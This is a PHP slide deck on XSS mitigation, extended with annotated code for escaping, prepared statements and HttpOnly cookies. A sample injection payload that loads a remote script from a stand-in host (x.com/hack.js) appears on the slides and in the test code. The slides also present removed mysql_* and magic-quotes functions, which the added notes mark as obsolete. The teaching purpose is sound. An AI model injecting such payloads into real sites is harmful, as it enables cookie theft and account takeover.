Kerdainos neos gnosis
Enjoy new knowledge
XSS MITIGATION
IN PHP
KERDAINO NEOS GNOSIS
Tinashe Makuti
Developer @Base2Theory
C, C++, PHP, VISUAL BASIC.NET
WEBSITE: www.educattem.com
Email: mtinashe@educattem.com
Contents
• WHAT IS XSS.
• DANGERS OF NOT MITIGATING IT.
• PHP'S HELP IN STOPPING DEADLY XSS (htmlentities)
• htmlspecialchars(), get_magic_quotes_gpc(), stripslashes(), mysql_real_escape_string()
• Setting the HttpOnly attribute in PHP so as to prevent client-side script access to protected cookies
What is XSS
Defined earlier on.
• Nevertheless: Cross Site Scripting (XSS) is the event in which an attacker injects a script, often JavaScript, into the output of a web application in such a way that it is executed in the client's browser.
DANGERS OF NOT TAKING ACTION AGAINST IT.
Cookies will be stolen.
• Stolen cookies help the attacker learn your client's username and password.
• The attacker can deploy a Trojan on your user's computer.
• The attacker, just like you, can take money out of the bank, as you are going to do today.
So what does uncle PHP say about this naughty boy XSS
PHP offers us a wide range of purifier functions, namely:
i. htmlentities()
ii. htmlspecialchars()
iii. get_magic_quotes_gpc()
iv. stripslashes()
v. mysql_real_escape_string()
Their use is shown on the next slides, where they are applied together to sanitize some vulnerable code.
Some dangerous code
<script src='http://x.com/hack.js'></script><script>hack();</script>
Our purpose is to neutralize this code.
• If allowed to run, this code will load a JavaScript program and then execute malicious functions.
• But this is not much of a threat if we apply the htmlentities sanitizer.
Some dangerous code, neutralized
htmlentities("<script src='http://x.com/hack.js'></script>")
htmlentities("<script>hack();</script>")
Neutralized.
• If allowed to run, this code now turns into the harmless string below:
&lt;script src='http://x.com/hack.js'&gt;&lt;/script&gt;&lt;script&gt;hack();&lt;/script&gt;
• The good thing about this is that the browser renders it as text, so it is harmless to our client's machine.
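As an added example (not part of the slides), the following helper does the same job with htmlspecialchars() and the flags a practitioner would normally pin, run against the payload from the slide. The output shown above leaves the single quotes untouched because, before PHP 8.1, htmlentities() and htmlspecialchars() defaulted to ENT_COMPAT, which encodes only double quotes; from PHP 8.1 the default is ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401. Passing the flags explicitly gives the same result on every version. The helper name e() and the sample inputs are my own.

```php
<?php
declare(strict_types=1);

// Added example, not from the slides. Escaping helper for the HTML body and
// attribute contexts. The name e() and the sample inputs are constructed.
function e(string $untrusted): string
{
    // ENT_QUOTES: encode both " and ' so the value cannot close a quoted attribute.
    // ENT_SUBSTITUTE: replace invalid UTF-8 with U+FFFD instead of returning ''.
    // Explicit charset: do not depend on the default_charset ini setting.
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The payload from the slide (constructed sample input).
$payload = "<script src='http://x.com/hack.js'></script><script>hack();</script>";

// Body context: the markup becomes visible text instead of being parsed.
echo '<p>' . e($payload) . "</p>\n";

// Attribute context: with ENT_QUOTES the single quotes are encoded too, so the
// same helper is safe inside a single- or double-quoted attribute value.
echo "<input type='text' value='" . e($payload) . "'>\n";

// Self-check of the exact encoding (ENT_HTML401 doctype encodes ' as &#039;).
$expected = '&lt;script src=&#039;http://x.com/hack.js&#039;&gt;&lt;/script&gt;'
          . '&lt;script&gt;hack();&lt;/script&gt;';
assert(e($payload) === $expected);

// Invalid UTF-8 is replaced rather than making the whole value disappear,
// which is what happens without ENT_SUBSTITUTE.
assert(e("abc\xff") === "abc\u{FFFD}");

// Limits: this helper is for HTML text and attribute values only. Data placed
// inside a <script> block, a CSS value or a URL needs the escaping rules of
// that context; htmlspecialchars() alone is not sufficient there.
```

The two assert() calls document the exact output so a regression in flags or charset shows up immediately; in production builds with zend.assertions disabled they simply compile away.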
Another example: Uncle PHP at work
<?php
// Note: mysql_real_escape_string() needs an open mysql_* connection and, together
// with the whole mysql extension, was removed in PHP 7.0; get_magic_quotes_gpc()
// was deprecated in PHP 7.4 and removed in PHP 8.0. The pattern is shown here as
// the slides present it.
function mysql_entities_fix_string($string)
{
    // SQL escaping first, then HTML encoding of the result.
    return htmlentities(mysql_fix_string($string));
}
function mysql_fix_string($string)
{
    // Undo magic_quotes auto-escaping so the value is not escaped twice.
    if (get_magic_quotes_gpc()) $string = stripslashes($string);
    return mysql_real_escape_string($string);
}
?>
The mysql_entities_fix_string function first calls mysql_fix_string and then passes the result through htmlentities before returning the fully sanitized string.
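The slide's function escapes for two contexts in one call, so whatever is stored in the database is already HTML-encoded and cannot safely be reused for anything but HTML output. As an added example (not from the slides), the following does the same job with current PHP: a PDO prepared statement replaces mysql_real_escape_string() for storage, and htmlspecialchars() is applied only when rendering. It uses an in-memory SQLite database so it runs offline; the table name, function names and sample comments are constructed, and the same PDO calls work unchanged against MySQL.

```php
<?php
declare(strict_types=1);

// Added example, not from the slides: modern equivalent of mysql_entities_fix_string().
// SQL side: bound parameters, no escaping function. HTML side: escape at output only.
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');

function storeComment(PDO $db, string $body): void
{
    // The driver sends the value separately from the SQL text, so quotes and
    // backslashes in $body cannot alter the statement. No stripslashes(), no
    // magic quotes, no double escaping: the raw value is stored as-is.
    $stmt = $db->prepare('INSERT INTO comments (body) VALUES (:body)');
    $stmt->execute([':body' => $body]);
}

function renderComments(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT body FROM comments ORDER BY id') as $row) {
        // Escape for the HTML body context at the point of output. Because the
        // database holds the raw value, the same row can be emitted as JSON or
        // plain text elsewhere with the escaping that fits that context.
        $html .= '<li>' . htmlspecialchars($row['body'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</li>\n";
    }
    return $html;
}

// Constructed inputs: the payload from the slides and a quote-heavy string.
$payload = "<script src='http://x.com/hack.js'></script><script>hack();</script>";
$quotes  = "O'Reilly said \"hi\" \\ backslash";
storeComment($db, $payload);
storeComment($db, $quotes);

// Round trip: the quote-heavy value is stored byte-for-byte, proving the
// prepared statement needed no escaping of its own.
$stored = $db->query('SELECT body FROM comments WHERE id = 2')->fetchColumn();
assert($stored === $quotes);

// Rendering: no raw <script> survives, the encoded form does.
$out = renderComments($db);
echo $out;
assert(strpos($out, '<script') === false);
assert(strpos($out, '&lt;script src=&#039;http://x.com/hack.js&#039;&gt;') !== false);
```

The design point is separation of concerns: storage code knows nothing about HTML, and the template knows nothing about SQL, so each escaping decision is made exactly once, in the layer that knows the context.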
Finally, restricting access to our cookies using HttpOnly
HttpOnly mitigates the risk of a client-side script accessing our protected cookies.
• However, this only works if the browser in use supports the HttpOnly attribute.
Using PHP to set HttpOnly
PHP supports setting the HttpOnly flag from version 5.0.2.
Thus, for session cookies managed by PHP, the flag can be set permanently in the php.ini file, i.e.
session.cookie_httponly = True
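As an added example (not from the slides), here is the same flag set at runtime rather than in php.ini, both for the PHP session cookie and for an ordinary application cookie, using the array forms available since PHP 7.3. Cookie names and values are placeholders. As the previous slide notes, a browser that does not understand HttpOnly simply ignores it, so the flag limits the damage of a successful script injection and complements output escaping rather than replacing it.

```php
<?php
declare(strict_types=1);

// Added example, not from the slides. Runtime equivalents of
// session.cookie_httponly = 1, plus the same flag on an application cookie.
// Requires PHP 7.3+ for the options-array form of both functions.

// 1. Session cookie. Must be called before session_start(). Secure and SameSite
//    are set alongside HttpOnly: a cookie scripts cannot read is still exposed
//    on the wire if it travels over plain HTTP.
session_set_cookie_params([
    'lifetime' => 0,        // session cookie, discarded when the browser closes
    'path'     => '/',
    'domain'   => '',       // current host only
    'secure'   => true,     // HTTPS only
    'httponly' => true,     // not readable from document.cookie
    'samesite' => 'Lax',
]);

// Self-check: read the effective parameters back before the session starts.
$params = session_get_cookie_params();
assert($params['httponly'] === true);
assert($params['secure'] === true);
assert($params['samesite'] === 'Lax');

// 2. Application cookie (placeholder name and value). Without 'httponly' => true
//    the value is readable from client-side script.
function setRememberMeCookie(string $opaqueToken): bool
{
    if (headers_sent()) {
        return false;       // too late to add headers; caller should log this
    }
    return setcookie('remember_me', $opaqueToken, [
        'expires'  => time() + 86400 * 30,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
}

setRememberMeCookie('opaque-token-placeholder');
```

If the deployment cannot change php.ini, ini_set('session.cookie_httponly', '1') before session_start() has the same effect as the session_set_cookie_params() call above; either way, verify the Set-Cookie header in the browser's developer tools once, since a reverse proxy or framework may rewrite it.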
